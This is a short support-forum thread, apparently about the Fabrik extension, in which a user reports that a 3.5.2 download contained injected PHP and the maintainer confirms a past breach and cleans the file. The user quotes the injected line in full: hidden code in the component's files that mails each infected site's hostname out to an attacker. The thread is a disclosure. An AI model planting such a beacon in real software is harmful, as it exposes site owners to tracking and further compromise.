Download version 3.5.2 infected?


New Member
Hi There,
I just upgraded my development environment to fabrik 3.5.2, downloaded from
After installation emails started to be sent. I found out that following code is placed at the top in administrator/components/com_fabrik/fabrik.php, administrator/components/com_fabrik/helpers/fabrik.php,

<?php $to = ',';$subject = 'Hits ada lagi';$message = $_SERVER['HTTP_HOST'];$headers[] = 'From: Hidden Hits <>';mail($to, $subject, $message, implode("\r\n", $headers));?>

Is it save to use this version after I remove the mailing code?

Hmmm, I can't find anything in the 3.5.2 download.

Do you still have a copy of the ZIP you installed from?

-- hugh
I've cleaned it up. Looking at the date on that file, it was consistent with a breach earlier this year that we thought we'd completely cleaned up after, and that a number of other extension sites got hit with. I've checked all the other zips from 3.4 onwards, nothing else seems to be affected.

Thanks for reporting it.

-- hugh

Members online

No members online now.